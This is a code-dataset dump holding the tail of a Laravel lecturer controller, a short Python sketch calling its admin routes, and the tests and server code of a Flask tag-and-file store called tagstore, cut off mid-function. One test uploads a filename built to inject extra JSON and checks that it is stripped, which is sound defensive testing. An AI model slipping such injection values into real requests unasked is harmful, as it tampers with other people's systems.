$id)->with('msg_edit', $msg_edit);\n }\n\n public function xoaGiangVien($id)\n {\n try {\n $giangvien = GiangVien::findOrFail($id);\n $giangvien->delete();\n $msg_delete = \"đã xóa 1 item\";\n } catch (\\Exception $e) {\n $msg_delete = \"có lỗi vui lòng thử lại\";\n }\n return redirect('/admin/show-giang-vien')->with('msg_delete', $msg_delete);\n }\n}\n" } ]
17
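For orientation, here is a minimal sketch of how a client could exercise the admin CRUD routes registered in the routes file above. It is illustrative only: the base URL and the pre-authenticated session are assumptions (the real routes sit behind the 'admin' middleware and Laravel's CSRF protection); only the paths and form field names, which mirror GiangVienController::saveGiangVien, come from the source.

# Hypothetical smoke test for the lecturer (giang vien) admin routes.
# BASE and the authenticated session are assumptions, not from the source.
import requests

BASE = 'http://localhost:8000'
session = requests.Session()

# List lecturers: GET admin/show-giang-vien
resp = session.get(BASE + '/admin/show-giang-vien')
print(resp.status_code)

# Create a lecturer: POST admin/save-giang-vien with the fields the
# controller reads: name, email, ngay/thang/nam (birth date parts), password.
resp = session.post(BASE + '/admin/save-giang-vien', data={
    'name': 'Nguyen Van A',
    'email': 'a@example.com',
    'ngay': '1',
    'thang': '1',
    'nam': '1990',
    'password': 'secret',
})
print(resp.status_code)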
cchdo/tagstore
https://github.com/cchdo/tagstore
98688046959edaac7192609e9515d3f064c5438a
e7e0703536d86d06eeb33ae72ecada56588897e2
2c5c87e35ed767981d1859a93af2b63fe8655fdf
refs/heads/master
2020-04-19T21:03:37.192440
2014-11-25T01:34:08
2014-11-25T01:34:08
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5602279305458069, "alphanum_fraction": 0.5683238506317139, "avg_line_length": 34.73735809326172, "blob_id": "0b79e28fc80fe46a91d4a2339c138f96301ec147", "content_id": "8063871d7092f3b2b4c0e9df6928763bdfcbfc1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25445, "license_type": "no_license", "max_line_length": 91, "num_lines": 712, "path": "/tests.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "import json\nimport types\nimport os.path\nfrom datetime import datetime, timedelta\nfrom StringIO import StringIO\nimport logging\nfrom time import sleep\nfrom threading import Thread, Condition, current_thread\nfrom multiprocessing import Process, Condition as mCondition\nfrom shutil import rmtree\nfrom urlparse import urlsplit\n\nlog = logging.getLogger(__name__)\n\nfrom nose.tools import nottest\n\nfrom flask import Flask\nfrom flask.ext.testing import TestCase, LiveServerTestCase\nfrom flask.ext.restless import ProcessingException\n\nimport requests\n\nimport tagstore\nfrom tagstore import server\nfrom tagstore.server import ofs, OFSWrapper\nfrom tagstore.client import TagStoreClient, Query, DataResponse\nfrom tagstore.models import db, Tag, Data\n\n\nAPI_ENDPOINT = '/api/v1'\n\n\ndef _create_test_app(self):\n app = Flask(__name__)\n app.config.from_object('tagstore.settings.default')\n app.config.from_object('tagstore.settings.test')\n server.init_app(app)\n return app\n\n\nclass BaseTest(TestCase):\n create_app = _create_test_app\n\n def setUp(self):\n db.create_all()\n try:\n rmtree(self.app.config['PTOFS_DIR'])\n except OSError:\n pass\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n try:\n rmtree(self.app.config['PTOFS_DIR'])\n except OSError:\n pass\n\n\nclass TestUnit(BaseTest):\n def test_replace_existing_tags(self):\n data = {'tags': []}\n server.replace_existing_tags(data)\n self.assertTrue(data['tags'] == [])\n\n data = {'tags': [{'tag': 'aaa'}]}\n server.replace_existing_tags(data)\n self.assertTrue(data['tags'][0] == {'tag': 'aaa'})\n\n db.session.add(Tag('aaa'))\n db.session.flush()\n data = {'tags': [{'tag': 'aaa'}]}\n server.replace_existing_tags(data)\n tag = Tag.query.filter_by(tag='aaa').first()\n self.assertTrue(data['tags'][0] == {'id': tag.id})\n\n data = {'tags': [{'tag': 'aaa'}, {'tag': 'bbb'}]}\n server.replace_existing_tags(data)\n tag = Tag.query.filter_by(tag='aaa').first()\n self.assertTrue(data['tags'][0] == {'id': tag.id})\n self.assertTrue(data['tags'][1] == {'tag': 'bbb'})\n\n def test_data_post(self):\n data = {'uri': 'abcd'}\n server.data_post(data)\n\n db.session.add(Data('abcd'))\n db.session.flush()\n with self.assertRaises(ProcessingException):\n server.data_post(data)\n\n def test_update_http_headers(self):\n headers = {}\n metadata = {}\n server._update_http_headers(headers, metadata, as_attachment=True)\n self.assertEqual(headers['Content-Disposition'], 'attachment; filename=')\n self.assertEqual(headers['Content-Type'], 'application/octet-stream')\n metadata['fname'] = 'test.txt'\n server._update_http_headers(headers, metadata)\n self.assertEqual(headers['Content-Disposition'],\n 'inline; filename=test.txt')\n self.assertEqual(headers['Content-Type'], 'text/plain')\n\n def test_zip_load(self):\n data = 'http://999.0.0.0'\n ddd = Data(data, 'broken')\n arcname = 'namea'\n szip = server.TempFileStreamingZipFile([server.DataWrapper(arcname, ddd, 'ofs')])\n zfile = iter(szip)\n contents = zfile.next()\n self.assertEqual(len(contents), 
22)\n\n def test_zip_max_size(self):\n data = 'data:text/html,'\n ddd = Data(data, 'nameb')\n arcname = 'namea'\n szip = server.TempFileStreamingZipFile([server.DataWrapper(arcname, ddd, 'ofs')])\n self.assertEqual(szip.max_size(), 22 + 88 + (len(arcname) + 1) * 2)\n\n\nclass RoutedTest(BaseTest):\n headers_json = {'Content-Type': 'application/json'}\n\n def http(self, func, endpoint, **kwargs):\n try:\n headers = kwargs['headers']\n except KeyError:\n headers = self.headers_json\n else:\n headers.update(self.headers_json)\n del kwargs['headers']\n func = getattr(self.client, func)\n return func(endpoint, headers=headers, **kwargs)\n\n\nclass TestViews(RoutedTest):\n api_data_endpoint = '{0}/data'.format(API_ENDPOINT)\n api_ofs_endpoint = '{0}/ofs'.format(API_ENDPOINT)\n api_zip_endpoint = '{0}/zip'.format(API_ENDPOINT)\n\n def test_data_post(self):\n data = {'uri': 'http://example.com', 'fname': 'testname'}\n response = self.http('post', self.api_data_endpoint, data=json.dumps(data))\n self.assert_status(response, 201, 'Failed to create data')\n data = {'uri': 'aaa'}\n response = self.http('post', self.api_data_endpoint, data=json.dumps(data))\n self.assert_status(response, 201, 'Failed to create data')\n data = {'uri': 'bbb', 'tags': []}\n response = self.http('post', self.api_data_endpoint, data=json.dumps(data))\n self.assert_status(response, 201, 'Failed to create data')\n data = {'uri': 'ccc', 'tags': [{'tag': 'ddd'}, {'tag': 'eee'}]}\n response = self.http('post', self.api_data_endpoint, data=json.dumps(data))\n self.assert_status(response, 201, 'Failed to create data')\n data = {'uri': 'ccc', 'tags': []}\n response = self.http('post', self.api_data_endpoint, data=json.dumps(data))\n self.assert_status(response, 409, 'Failed to identify conflict')\n\n def test_data_patch(self):\n data = {'uri': 'http://example.com'}\n response = self.http('post', self.api_data_endpoint, data=json.dumps(data))\n self.assert_status(response, 201, 'Failed to create data')\n tags = [{'tag': 'ddd'}, {'tag': 'eee'}]\n data = {'uri': 'http://example.com', 'tags': tags}\n uri = '{0}/{1}'.format(self.api_data_endpoint, response.json['id'])\n response = self.http('put', uri, data=json.dumps(data))\n self.assert_status(response, 200, 'Failed to edit data')\n self.assertEqual(sorted(x['tag'] for x in response.json['tags']),\n sorted(x['tag'] for x in tags))\n\n tags = [{'tag': 'eee'}]\n data = {'uri': 'http://example.com', 'tags': tags}\n uri = '{0}/{1}'.format(self.api_data_endpoint, response.json['id'])\n response = self.http('put', uri, data=json.dumps(data))\n self.assert_status(response, 200, 'Failed to edit data')\n self.assertEqual(sorted(x['tag'] for x in response.json['tags']),\n sorted(x['tag'] for x in tags))\n\n def test_data_query(self):\n filters = [dict(name='tags', op='any', val=dict(name='tag', op='eq', val='d'))]\n params = dict(q=json.dumps(dict(filters=filters)))\n response = self.http('get', self.api_data_endpoint, data=params)\n self.assert_200(response)\n\n filters = [dict(name='tags', op='not_any', val=dict(name='tag', op='eq', val='d'))]\n params = dict(q=json.dumps(dict(filters=filters)))\n response = self.http('get', self.api_data_endpoint, data=params)\n self.assert_200(response)\n\n def test_ofs_get(self):\n filecontents = 'btlex'\n aaa = StringIO(filecontents)\n fname = 'propername'\n resp = self.http('post', self.api_ofs_endpoint,\n data={'blob': (aaa, fname)},\n content_type='multipart/form-data')\n self.assert_200(resp)\n data = json.loads(resp.data)\n 
self.assertEqual(data['fname'], fname)\n\n path = urlsplit(data['uri']).path\n resp = self.http('get', path)\n self.assert_200(resp)\n self.assertEqual(resp.data, filecontents)\n\n resp = self.http('head', path)\n self.assertEqual(resp.headers['content-length'], str(5))\n\n resp = self.http('get', path, headers={'X-As-Attachment': 'yes'})\n self.assertTrue(\n resp.headers['content-disposition'].startswith('attachment'))\n\n def test_ofs_put(self):\n filecontents0 = 'btlex'\n filecontents1 = 'btlex'\n aaa = StringIO(filecontents0)\n fname = 'propername'\n resp = self.http('post', self.api_ofs_endpoint,\n data={'blob': (aaa, fname)},\n content_type='multipart/form-data')\n self.assert_200(resp)\n data = json.loads(resp.data)\n path = urlsplit(data['uri']).path\n\n aaa = StringIO(filecontents1)\n fname = 'propername'\n resp = self.http('put', path,\n data={'blob': (aaa, fname)},\n content_type='multipart/form-data')\n self.assert_200(resp)\n\n path = urlsplit(data['uri']).path\n resp = self.http('get', path)\n self.assert_200(resp)\n self.assertEqual(resp.data, filecontents1)\n\n def test_ofs_delete(self):\n filecontents0 = 'btlex'\n aaa = StringIO(filecontents0)\n fname = 'propername'\n resp = self.http('post', self.api_ofs_endpoint,\n data={'blob': (aaa, fname)},\n content_type='multipart/form-data')\n self.assert_200(resp)\n data = json.loads(resp.data)\n path = urlsplit(data['uri']).path\n resp = self.http('delete', path)\n self.assert_status(resp, 204)\n resp = self.http('get', path)\n self.assert_404(resp)\n\n def test_ofs_create(self):\n aaa = StringIO('btlex')\n injected_name = '\", {\"injected\": \"json\"}'\n resp = self.http('post', self.api_ofs_endpoint,\n data={'blob': (aaa, injected_name)},\n content_type='multipart/form-data')\n self.assert_200(resp)\n data = json.loads(resp.data)\n self.assertEqual(data['fname'], '')\n\n # No longer a valid test due to use of processes\n @nottest\n def test_ofs_create_threadsafe(self):\n \"\"\"Creating OFSWrapper needs to be threadsafe.\n\n Make sure that initializing the PTOFS is guarded.\n\n \"\"\"\n ofs_dir = self.app.config['PTOFS_DIR']\n\n class ThreadX(Thread):\n def run(self):\n ofs = OFSWrapper(storage_dir=ofs_dir)\n\n threada = ThreadX(name='aaa')\n threadb = ThreadX(name='bbb')\n\n threada.start()\n threadb.start()\n\n threada.join()\n threadb.join()\n\n def test_ofs_create_processsafe(self):\n \"\"\"Creating OFSWrapper needs to be processsafe.\n\n Make sure that initializing the PTOFS is guarded.\n\n \"\"\"\n ofs_dir = self.app.config['PTOFS_DIR']\n\n def run():\n ofs = OFSWrapper(storage_dir=ofs_dir)\n\n pa = Process(target=run)\n pb = Process(target=run)\n pa.start()\n pb.start()\n\n pa.join()\n pb.join()\n\n # No longer a valid test due to use of processes\n @nottest\n def test_ofs_put_stream_threadsafe(self):\n \"\"\"Editing streams needs to be threadsafe.\n\n \"\"\"\n ofs_dir = self.app.config['PTOFS_DIR']\n\n class ThreadX(Thread):\n def run(self):\n ofs = OFSWrapper(storage_dir=ofs_dir)\n ofs.call('put_stream', 'hello', StringIO(current_thread().name))\n\n threada = ThreadX(name='aaa')\n threadb = ThreadX(name='bbb')\n\n threada.start()\n threadb.start()\n\n threada.join()\n threadb.join()\n\n ofs = OFSWrapper(storage_dir=ofs_dir)\n out = ofs.call('get_stream', 'hello')\n # Result is whichever thread was started later\n self.assertEqual(out.read(), 'bbb')\n\n def test_ofs_put_stream_processsafe(self):\n \"\"\"Editing streams needs to be processsafe.\n\n \"\"\"\n ofs_dir = self.app.config['PTOFS_DIR']\n\n def run(name):\n ofs = 
OFSWrapper(storage_dir=ofs_dir)\n ofs.call('put_stream', 'hello', StringIO(name))\n\n pa = Process(target=run, args=('aaa',))\n pb = Process(target=run, args=('bbb',))\n\n pa.start()\n pb.start()\n\n pa.join()\n pb.join()\n\n ofs = OFSWrapper(storage_dir=ofs_dir)\n out = ofs.call('get_stream', 'hello')\n # Result is whichever thread was started later\n self.assertEqual(out.read(), 'bbb')\n\n # No longer a valid test due to use of processes\n @nottest\n def test_ofs_threadsafe(self):\n \"\"\"Concurrent edits to the OFS may not be threadsafe.\n\n OFS pairtree operates on a PersistentState object that is shared.\n\n \"\"\"\n ofs_dir = self.app.config['PTOFS_DIR']\n pausea = Condition()\n bucket = 'testbucket'\n\n class ThreadA(Thread):\n def run(self):\n ofs = OFSWrapper(storage_dir=ofs_dir)\n\n _, json_payload = ofs.ofs._get_object(bucket)\n json_payload.update(dict(aaa=111))\n log.debug('aaa {0}'.format(json_payload))\n\n # Avoid deadlock when B correctly waits for PTOFS lock and A is\n # already holding it. Allow A to continue and release the lock.\n count = 0\n while count < 1 and not pausea.acquire(False):\n sleep(0.1)\n count += 1\n json_payload.sync()\n\n class ThreadB(Thread):\n def run(self):\n ofs = OFSWrapper(storage_dir=ofs_dir)\n _, json_payload = ofs.ofs._get_object(bucket)\n json_payload.update(dict(bbb=222))\n log.debug('bbb {0}'.format(json_payload))\n json_payload.sync()\n\n threada = ThreadA()\n threadb = ThreadB()\n\n # Set up ThreadA, the persistent state is read in\n pausea.acquire()\n threada.start()\n\n # Run ThreadB\n threadb.start()\n threadb.join()\n\n # Allow ThreadA to continue, the persistent state is written out.\n # If no locking, ThreadB's changes will be wiped out.\n pausea.release()\n threada.join()\n\n ofs = OFSWrapper(storage_dir=ofs_dir)\n _, json_payload = ofs.ofs._get_object(bucket)\n self.assertEqual(dict(aaa=111, bbb=222), json_payload)\n\n def test_ofs_processsafe(self):\n \"\"\"Concurrent edits to the OFS may not be processsafe.\n\n OFS pairtree operates on a PersistentState object that is shared.\n\n \"\"\"\n ofs_dir = self.app.config['PTOFS_DIR']\n pausea = mCondition()\n bucket = 'testbucket'\n\n def runa():\n ofs = OFSWrapper(storage_dir=ofs_dir)\n\n _, json_payload = ofs.ofs._get_object(bucket)\n json_payload.update(dict(aaa=111))\n log.debug('aaa {0}'.format(json_payload))\n\n # Avoid deadlock when B correctly waits for PTOFS lock and A is\n # already holding it. 
Allow A to continue and release the lock.\n count = 0\n while count < 1 and not pausea.acquire(False):\n sleep(0.1)\n count += 1\n json_payload.sync()\n\n def runb():\n ofs = OFSWrapper(storage_dir=ofs_dir)\n _, json_payload = ofs.ofs._get_object(bucket)\n json_payload.update(dict(bbb=222))\n log.debug('bbb {0}'.format(json_payload))\n json_payload.sync()\n\n pa = Process(target=runa)\n pb = Process(target=runb)\n\n # Set up aaa, the persistent state is read in\n pausea.acquire()\n pa.start()\n\n # Run bbb\n pb.start()\n pb.join()\n\n # Allow aaa to continue, the persistent state is written out.\n # If no locking, bbb's changes will be wiped out.\n pausea.release()\n pa.join()\n\n ofs = OFSWrapper(storage_dir=ofs_dir)\n _, json_payload = ofs.ofs._get_object(bucket)\n self.assertEqual(dict(aaa=111, bbb=222), json_payload)\n\n def test_gc(self):\n faa = StringIO('aaa')\n fbb = StringIO('bbb')\n fcc = StringIO('ccc')\n\n resp = self.http('post', self.api_ofs_endpoint,\n data={'blob': (faa, 'namea')},\n content_type='multipart/form-data')\n dataa = json.loads(resp.data)\n daa = Data(dataa['uri'], 'namea')\n db.session.add(daa)\n db.session.flush()\n resp = self.http('post', self.api_ofs_endpoint,\n data={'blob': (fbb, 'nameb')},\n content_type='multipart/form-data')\n datab = json.loads(resp.data)\n resp = self.http('post', self.api_ofs_endpoint,\n data={'blob': (fcc, 'namec')},\n content_type='multipart/form-data')\n datac = json.loads(resp.data)\n\n dcclabel = os.path.basename(datac['uri'])\n olddate = (datetime.now() - timedelta(seconds=61)).strftime('%Y-%m-%dT%H:%M:%S')\n _, json_payload = ofs.ofs._get_object(ofs.BUCKET_LABEL)\n json_payload[dcclabel]['_last_modified'] = olddate\n json_payload.sync()\n\n self.assertEqual(len(ofs.call('list_labels')), 3)\n # If a blob is referenced, do not delete it\n # If a blob was created in the last minute, do not delete it, it may not\n # have been associated with its Data resource yet.\n # else, go ahead and remove the blob...\n server.gc_ofs()\n self.assertEqual(sorted(ofs.call('list_labels')),\n sorted([os.path.basename(dataa['uri']),\n os.path.basename(datab['uri'])]))\n\n def test_zip(self):\n faa = StringIO('aaa')\n resp = self.http('post', self.api_ofs_endpoint,\n data={'blob': (faa, 'namea')},\n content_type='multipart/form-data')\n dataa = json.loads(resp.data)\n daa = Data(dataa['uri'], 'namea')\n db.session.add(daa)\n db.session.flush()\n dbb = Data('data:text/html,', 'nameb')\n db.session.add(dbb)\n db.session.flush()\n\n data_arcnames = [(daa.id, 'namea'), (dbb.id, 'namea/nameb')]\n fname = 'test.zip'\n data = dict(data_arcnames=data_arcnames,\n ofs_endpoint=self.api_ofs_endpoint, fname=fname)\n resp = self.http('post', self.api_zip_endpoint, data=json.dumps(data))\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.headers['Content-Type'], 'application/zip')\n self.assertEqual(resp.headers['Content-Disposition'],\n 'attachment; filename={0}'.format(fname))\n\n\nclass TestClient(LiveServerTestCase):\n def create_app(self):\n app = _create_test_app(self)\n self.port = app.config['LIVESERVER_PORT']\n self.FQ_API_ENDPOINT = '{0}{1}'.format(self.get_server_url(),\n API_ENDPOINT)\n with app.app_context():\n db.create_all()\n return app\n\n def setUp(self):\n super(TestClient, self).setUp()\n try:\n rmtree(self.app.config['PTOFS_DIR'])\n except OSError:\n pass\n self.tstore = TagStoreClient(self.FQ_API_ENDPOINT)\n\n def tearDown(self):\n super(TestClient, self).tearDown()\n try:\n rmtree(self.app.config['PTOFS_DIR'])\n except 
OSError:\n pass\n with self.app.app_context():\n db.session.remove()\n db.drop_all()\n\n def test_create(self):\n uri = 'aaa'\n tags = [u'm', u'n']\n resp = self.tstore.create(uri, None, tags)\n self.assertEqual(resp.uri, uri)\n self.assertEqual(sorted(resp.tags), sorted(tags))\n\n uri = 'bbb'\n tags = [u'm', u'o']\n resp = self.tstore.create(uri, None, tags)\n self.assertEqual(resp.uri, uri)\n self.assertEqual(sorted(resp.tags), sorted(tags))\n\n resp = self.tstore.create('aaa', None, [u'm', u'n'])\n self.assertEqual(resp, None)\n\n def test_query_data(self):\n self.tstore.create('aaa', None, [u'm', u'n'])\n self.tstore.create('bbb', None, [u'm', u'o'])\n\n resp = self.tstore.query_data(Query.tags_any('eq', u'm'))\n self.assertEquals(len(resp), 2)\n\n def test_query_tags(self):\n self.tstore.create('aaa', None, [u'm', u'n:/asdf'])\n self.tstore.create('bbb', None, [u'm', u'n:/asdf/qwer'])\n\n resp = self.tstore.query_tags(['tag', 'eq', u'm'])\n self.assertEquals(len(resp), 1)\n\n resp = self.tstore.query_tags(['tag', 'like', u'n:/asdf%'])\n self.assertEquals(len(resp), 2)\n\n def test_edit(self):\n resp = self.tstore.create('aaa', None, [u'm', u'n'])\n\n d_id = resp.id\n\n resp = self.tstore.edit(d_id, 'aaa', '', [u'n'])\n self.assertEqual(resp.tags, [u'n'])\n\n def test_local_file(self):\n aaa = StringIO('btlex')\n self.tstore.create(aaa, None, [\n 'cruise:1234', 'datatype:bottle', 'format:exchange', 'preliminary'])\n\n bbb = StringIO('ctdex')\n resp = self.tstore.create(bbb, 'bname', [\n 'cruise:1234', 'datatype:ctd', 'format:exchange'])\n\n self.assertEqual(resp.fname, 'bname')\n\n ccc = StringIO('ctdzipnc')\n self.tstore.create(ccc, None, [\n 'cruise:1234', 'datatype:ctd', 'format:zip.netcdf'])\n\n response = self.tstore.query_data(Query.tags_any('eq', 'format:exchange'))\n self.assertEqual(len(response), 2)\n\n def test_local_file_http(self):\n \"\"\"HTTP headers should be set appropriately.\"\"\"\n aaa = StringIO('btlex')\n resp = self.tstore.create(aaa, None, [])\n resp = requests.get(resp.uri)\n headers = resp.headers\n self.assertTrue(headers['content-disposition'].endswith('blob'))\n self.assertEqual(headers['content-length'], '5')\n\n def test_delete_tag(self):\n resp = self.tstore.create('aaa', 'aname', ['taga'])\n tag = self.tstore.query_tags(['tag', 'eq', 'taga'])[0]\n t_id = tag.id\n with self.assertRaises(ValueError):\n self.tstore.delete_tag(t_id)\n self.tstore.edit(resp.id, 'aaa', 'aname', [])\n self.tstore.delete_tag(t_id)\n self.assertEqual(self.tstore.query_data(['fname', 'eq',\n 'aname'])[0].tags, [])\n\n def test_delete_local_file(self):\n ccc = StringIO('ctdzipnc')\n resp = self.tstore.create(ccc)\n d_id = resp.id\n self.tstore.delete(d_id)\n\n def test_query_response(self):\n for iii in range(20):\n self.tstore.create(u'test:{0}'.format(iii), None, [u'm'])\n resp = self.tstore.query_data(Query.tags_any('eq', u'm'))\n self.assertEqual(len(resp), 20)\n self.assertEqual(resp[15].uri, u'test:15')\n self.assertEqual(len(resp[9:15]), 6)\n self.assertEqual(resp[::-1][0].uri, u'test:19')\n with self.assertRaises(IndexError):\n resp[20]['uri']\n\n resp = self.tstore.query_data(Query.tags_any('eq', u'asdf'))\n self.assertEqual(len(resp), 0)\n resp = self.tstore.query_data(['uri', 'eq', u'test:19'], single=True)\n self.assertTrue(isinstance(resp, DataResponse))\n\n # More than one result\n with self.assertRaises(ValueError):\n self.tstore.query_data(Query.tags_any('eq', 'm'), single=True)\n\n resp = self.tstore.query_data(Query.tags_any('eq', 'm'), limit=1, single=True)\n 
self.assertTrue(isinstance(resp, DataResponse))\n\n resp = self.tstore.query_data(Query.tags_any('eq', u'asdf'), single=True)\n self.assertIsNone(resp)\n\n def test_data_response(self):\n \"\"\"Reading from a Data pointing to a URL should make the request.\"\"\"\n data = self.tstore.create(self.FQ_API_ENDPOINT + '/data')\n self.assertEqual(data.filename, 'data')\n self.assertEqual(data.open().read(1), '{')\n\n aaa = StringIO('hi')\n aaa.name = 'fname.txt'\n data = self.tstore.create(aaa)\n self.assertEqual(data.filename, aaa.name)\n self.assertEqual(data.open().read(2), 'hi')\n\n def test_edit_fname(self):\n aaa = StringIO('ctdzipnc')\n data = self.tstore.create(aaa, 'testname', ['tag0'])\n data = self.tstore.edit(data.id, data.uri, 'newname', data.tags)\n label = data.uri.split('/')[-1]\n with self.app.app_context():\n meta = ofs.call('get_metadata', label)\n self.assertEqual(meta['fname'], 'newname')\n\n def test_edit_tag(self):\n data = self.tstore.create('uri', 'fname', ['oldtag'])\n tag = self.tstore.query_tags(\n ['tag', 'eq', 'oldtag'], limit=1, single=True)\n tag = self.tstore.edit_tag(tag.id, 'newtag')\n self.assertEqual(tag.tag, 'newtag')\n\n def test_edit_tag_already_present(self):\n data = self.tstore.create('uri', 'fname', ['oldtag1', 'oldtag2'])\n tag = self.tstore.query_tags(\n ['tag', 'eq', 'oldtag1'], limit=1, single=True)\n tag = self.tstore.edit_tag(tag.id, 'oldtag2')\n self.assertEqual(tag.tag, 'oldtag2')\n tags = self.tstore.query_tags(['tag', 'eq', 'oldtag2'])\n self.assertEqual(tags[0].tag, 'oldtag2')\n tags = self.tstore.query_tags()\n self.assertEqual(len(tags), 1)\n\n def test_swap_tags(self):\n data = self.tstore.create('uri0', 'fname', ['oldtag1'])\n data = self.tstore.create('uri1', 'fname', ['oldtag2', 'oldtag1'])\n self.tstore.swap_tags('oldtag1', 'oldtag2')\n\n for data in self.tstore.query_data():\n self.assertEqual(data.tags, ['oldtag2'])\n\n self.tstore.swap_tags('oldtag2', 'oldtag1')\n\n for data in self.tstore.query_data():\n self.assertEqual(data.tags, ['oldtag1'])\n" }, { "alpha_fraction": 0.5693042278289795, "alphanum_fraction": 0.5743528604507446, "avg_line_length": 30.668603897094727, "blob_id": "aab1013cf696e588dd4e102c215b2647f21a7263", "content_id": "6c4be5e09a3072434dd68308c93e0e9c1c52939b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10894, "license_type": "no_license", "max_line_length": 84, "num_lines": 344, "path": "/tagstore/server.py", "repo_name": "cchdo/tagstore", "src_encoding": "UTF-8", "text": "from uuid import uuid4\nimport os.path\nimport logging\nfrom datetime import datetime, timedelta\nfrom mimetypes import guess_type\nfrom traceback import format_exc\nimport json\n\nlog = logging.getLogger(__name__)\n\nimport requests\n\nfrom flask import (\n Flask, g, Blueprint, current_app, jsonify, abort, request, send_file,\n make_response, Response, stream_with_context\n)\nfrom flask.ext.restless import APIManager, ProcessingException, search\n\nfrom werkzeug.local import LocalProxy\n\nfrom ofs.local import PTOFS\n\n\nfrom models import db, Tag, Data, tags\nfrom tempfilezipstream import TempFileStreamingZipFile, FileWrapper\nfrom patch.ptofs import patch_ptofs\nimport patch.restless\nfrom patch.lockfile import RLockFile, lockpath\n\n\nclass OFSWrapper(object):\n # 2-char bucket label for shallower pairtree\n BUCKET_LABEL = u'ts'\n\n def __init__(self, **kwargs):\n self.ofslock = RLockFile(lockpath(\n os.path.dirname(kwargs['storage_dir']), 'ofs'))\n self.init(**kwargs)\n\n def 
init(self, **kwargs):\n self.ofslock.acquire()\n self.ofs = PTOFS(uri_base='urn:uuid:', hashing_type='sha256', **kwargs)\n if self.BUCKET_LABEL not in self.ofs.list_buckets():\n self.bucket_id = self.ofs.claim_bucket(self.BUCKET_LABEL)\n else:\n self.bucket_id = self.BUCKET_LABEL\n self.ofslock.release()\n patch_ptofs(self.ofs.storage_dir)\n\n def call(self, method, *args, **kwargs):\n try:\n return getattr(self.ofs, method)(self.bucket_id, *args, **kwargs)\n except Exception as exc:\n log.error(u'{0} failed for {1}\\n{2}'.format(\n method, args, format_exc(exc)))\n raise\n\n\ndef get_ofs():\n ofs = getattr(g, '_ofs', None)\n if ofs is None:\n ofs = g._ofs = OFSWrapper(storage_dir=current_app.config['PTOFS_DIR'])\n return ofs\n\n\nofs = LocalProxy(get_ofs)\n\n\napi_v1_prefix = '/api/v1'\n\n\ndef replace_existing_tags(data):\n \"\"\"Replace any existing tags with the tag id.\"\"\"\n try:\n tags = data['tags']\n new_tags = [tag['tag'] for tag in tags]\n old_tags = Tag.query.filter(Tag.tag.in_(new_tags)).all()\n old_tag_ids = {}\n for tag in old_tags:\n old_tag_ids[tag.tag] = tag.id\n for tag in tags:\n ttt = tag['tag']\n if ttt in old_tag_ids:\n del tag['tag']\n tag['id'] = old_tag_ids[ttt]\n except KeyError:\n pass\n\n\ndef data_patch_single(instance_id=None, data=None, **kw):\n replace_existing_tags(data)\n\n\ndef is_uri_present_for_data(data):\n try:\n uri = data['uri']\n except KeyError:\n pass\n else:\n try:\n old = Data.query.filter_by(uri=uri).first()\n except Exception as err:\n log.error(err)\n raise\n if old:\n return True\n return False\n\n\ndef data_post(data=None, **kw):\n if is_uri_present_for_data(data):\n raise ProcessingException(description='Already present', code=409)\n\n replace_existing_tags(data)\n\n\nclass TagPatchSingle(object):\n new_tag = None\n\n @classmethod\n def pre(cls, instance_id=None, data=None, **kw):\n tag = Tag.query.filter_by(tag=data['tag']).first()\n if tag:\n # The \"new\" tag is really replacing with a preexisting tag.\n tags.update().where(\n tags.c.tag_id == instance_id).values(tag_id=tag.id)\n data['tag'] = 'newtag{0}'.format(tag.id)\n cls.new_tag = tag.id\n\n @classmethod\n def post(cls, result=None, **kw):\n if cls.new_tag != None:\n tag = Tag.query.get(result['id'])\n db.session.delete(tag)\n db.session.commit()\n newtag = Tag.query.get(cls.new_tag)\n result['id'] = newtag.id\n result['tag'] = newtag.tag\n cls.new_tag = None\n\n\ndef tag_delete(instance_id=None, **kw):\n any_referencing = db.session.query(tags.c.tag_id).filter(\n tags.c.tag_id == instance_id).count()\n if any_referencing:\n raise ProcessingException(description='Tag is referenced', code=409)\n\n\ndef _is_local_ofs(ofs_endpoint, uri):\n return uri.startswith(ofs_endpoint)\n\n\nzip_blueprint = Blueprint('zip', __name__, )\n\n\nclass DataWrapper(FileWrapper):\n def __init__(self, arcname, datum, ofs_endpoint):\n self._arcname = arcname\n self.uri = datum.uri\n self.is_local = _is_local_ofs(ofs_endpoint, self.uri)\n if self.is_local:\n self.uri = self.uri.split('/')[-1]\n\n @property\n def arcname(self):\n return self._arcname\n\n def get_stream(self):\n if self.is_local:\n stream = ofs.call('get_stream', self.uri)\n else:\n try:\n stream = requests.get(self.uri, stream=True).raw\n except requests.exceptions.RequestException:\n return None\n return stream\n\n def __len__(self):\n if self.is_local:\n metadata = ofs.call('get_metadata', self.uri)\n content_len = metadata['_content_length']\n else:\n try:\n resp = requests.head(self.uri)\n except 
requests.exceptions.RequestException:\n content_len = 0\n else:\n content_len = int(resp.headers.get('content-length', 0))\n return content_len\n\n\n@zip_blueprint.route('{0}/zip'.format(api_v1_prefix), methods=['POST'])\ndef zip():\n json = request.get_json()\n ofs_endpoint = json['ofs_endpoint']\n wrappers = []\n for did, arcname in json['data_arcnames']:\n wrappers.append(\n DataWrapper(arcname, Data.query.get(did), ofs_endpoint))\n fname = json['fname']\n\n szip = TempFileStreamingZipFile(wrappers)\n response = Response(stream_with_context(iter(szip)),\n mimetype='application/zip')\n response.headers['Content-Disposition'] = \\\n 'attachment; filename={0}'.format(fname)\n # no size can be given for the response because we can't know it in advance.\n return response\n\n\nstore_blueprint = Blueprint('storage', __name__, )\n\n\n@store_blueprint.route('{0}/ofs'.format(api_v1_prefix), methods=['POST'])\ndef ofs_create():\n fobj = request.files['blob']\n label = str(uuid4())\n ofs.call('put_stream', label, fobj)\n fname = fobj.filename\n ofs.call('update_metadata', label, {'fname': fname})\n return jsonify(dict(uri='{0}/{1}'.format(request.url, label), fname=fname))\n\n\ndef _update_http_headers(headers, metadata, as_attachment=False):\n fname = metadata.get('fname', '')\n disposition = 'inline'\n if as_attachment:\n disposition = 'attachment'\n headers['Content-Disposition'] = '{0}; filename={1}'.format(\n disposition, fname)\n mtype = guess_type(fname)[0]\n if not mtype:\n mtype = 'application/octet-stream'\n headers['Content-Type'] = metadata.get('_format', mtype)\n try:\n 